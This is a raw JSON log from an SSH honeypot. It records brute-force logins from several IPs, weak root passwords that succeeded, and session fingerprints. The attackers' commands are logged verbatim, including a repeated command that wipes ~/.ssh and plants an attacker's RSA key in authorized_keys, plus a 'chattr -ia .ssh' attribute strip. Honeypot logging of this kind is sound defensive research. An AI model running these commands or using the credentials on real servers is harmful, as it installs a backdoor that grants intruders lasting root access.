{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:44:38.964639Z","src_ip":"152.32.129.236","session":"b6faad5c4960"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:44:39.226754Z","src_ip":"152.32.129.236","session":"b6faad5c4960"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:44:39.227624Z","src_ip":"152.32.129.236","session":"b6faad5c4960"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":60194,"dst_ip":"1.2.3.4","dst_port":22,"session":"56e8e194e307","protocol":"ssh","message":"New connection: 152.32.129.236:60194 (1.2.3.4:22) [session: 56e8e194e307]","sensor":"my-vps","timestamp":"2025-09-09T00:44:39.377051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:44:39.377933Z","src_ip":"152.32.129.236","session":"56e8e194e307"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:44:39.585464Z","src_ip":"152.32.129.236","session":"56e8e194e307"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:44:40.457504Z","src_ip":"152.32.129.236","session":"56e8e194e307"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:44:41.667567Z","src_ip":"152.32.129.236","session":"56e8e194e307"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":60210,"dst_ip":"1.2.3.4","dst_port":22,"session":"9911b08e831d","protocol":"ssh","message":"New connection: 152.32.129.236:60210 (1.2.3.4:22) [session: 9911b08e831d]","sensor":"my-vps","timestamp":"2025-09-09T00:44:41.989669Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:44:41.990612Z","src_ip":"152.32.129.236","session":"9911b08e831d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:44:42.255847Z","src_ip":"152.32.129.236","session":"9911b08e831d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:44:43.358867Z","src_ip":"152.32.129.236","session":"9911b08e831d"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:44:43.625410Z","src_ip":"152.32.129.236","session":"b6faad5c4960"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:44:43.626647Z","src_ip":"152.32.129.236","session":"9911b08e831d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38582,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a43fa87367d","protocol":"ssh","message":"New connection: 212.227.235.229:38582 (1.2.3.4:22) [session: 8a43fa87367d]","sensor":"my-vps","timestamp":"2025-09-09T00:44:54.034257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:44:54.035043Z","src_ip":"212.227.235.229","session":"8a43fa87367d"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T00:44:54.322655Z","src_ip":"212.227.235.229","session":"8a43fa87367d"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:45:02.034968Z","src_ip":"212.227.235.229","session":"8a43fa87367d"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":33122,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9980c1c3f68","protocol":"ssh","message":"New connection: 43.156.132.147:33122 (1.2.3.4:22) [session: a9980c1c3f68]","sensor":"my-vps","timestamp":"2025-09-09T00:45:15.166797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:45:15.168120Z","src_ip":"43.156.132.147","session":"a9980c1c3f68"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:45:15.431383Z","src_ip":"43.156.132.147","session":"a9980c1c3f68"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"1","message":"login attempt [esuser/1] failed","sensor":"my-vps","timestamp":"2025-09-09T00:45:16.526444Z","src_ip":"43.156.132.147","session":"a9980c1c3f68"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:45:17.792517Z","src_ip":"43.156.132.147","session":"a9980c1c3f68"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":42803,"dst_ip":"1.2.3.4","dst_port":22,"session":"b58186af77fd","protocol":"ssh","message":"New connection: 103.100.209.195:42803 (1.2.3.4:22) [session: b58186af77fd]","sensor":"my-vps","timestamp":"2025-09-09T00:45:18.335400Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:45:18.340235Z","src_ip":"103.100.209.195","session":"b58186af77fd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:45:18.541085Z","src_ip":"103.100.209.195","session":"b58186af77fd"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty1234!","message":"login attempt [root/Qwerty1234!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:45:19.354035Z","src_ip":"103.100.209.195","session":"b58186af77fd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:45:19.787996Z","src_ip":"103.100.209.195","session":"b58186af77fd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:45:19.788659Z","src_ip":"103.100.209.195","session":"b58186af77fd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:45:19.789823Z","src_ip":"103.100.209.195","session":"b58186af77fd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:45:19.992472Z","src_ip":"103.100.209.195","session":"b58186af77fd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:45:20.501213Z","src_ip":"103.100.209.195","session":"b58186af77fd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:45:20.502025Z","src_ip":"103.100.209.195","session":"b58186af77fd"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:45:20.705677Z","src_ip":"103.100.209.195","session":"b58186af77fd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:45:20.706480Z","src_ip":"103.100.209.195","session":"b58186af77fd"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":43303,"dst_ip":"1.2.3.4","dst_port":22,"session":"da0661789a28","protocol":"ssh","message":"New connection: 103.100.209.195:43303 (1.2.3.4:22) [session: da0661789a28]","sensor":"my-vps","timestamp":"2025-09-09T00:45:20.901507Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:45:20.908045Z","src_ip":"103.100.209.195","session":"da0661789a28"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:45:21.104095Z","src_ip":"103.100.209.195","session":"da0661789a28"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:45:21.908532Z","src_ip":"103.100.209.195","session":"da0661789a28"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:45:23.107489Z","src_ip":"103.100.209.195","session":"da0661789a28"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":43923,"dst_ip":"1.2.3.4","dst_port":22,"session":"086ea518fd86","protocol":"ssh","message":"New connection: 103.100.209.195:43923 (1.2.3.4:22) [session: 086ea518fd86]","sensor":"my-vps","timestamp":"2025-09-09T00:45:23.308409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:45:23.312673Z","src_ip":"103.100.209.195","session":"086ea518fd86"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:45:23.517639Z","src_ip":"103.100.209.195","session":"086ea518fd86"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:45:24.342880Z","src_ip":"103.100.209.195","session":"086ea518fd86"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:45:24.553301Z","src_ip":"103.100.209.195","session":"b58186af77fd"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:45:24.554102Z","src_ip":"103.100.209.195","session":"086ea518fd86"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63612,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0a4c0b193e8","protocol":"ssh","message":"New connection: 217.72.205.35:63612 (1.2.3.4:22) [session: f0a4c0b193e8]","sensor":"my-vps","timestamp":"2025-09-09T00:45:40.974763Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:45:40.976378Z","src_ip":"217.72.205.35","session":"f0a4c0b193e8"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":44346,"dst_ip":"1.2.3.4","dst_port":22,"session":"71fe39c49c02","protocol":"ssh","message":"New connection: 152.32.129.236:44346 (1.2.3.4:22) [session: 71fe39c49c02]","sensor":"my-vps","timestamp":"2025-09-09T00:45:51.284930Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:45:51.285913Z","src_ip":"152.32.129.236","session":"71fe39c49c02"}
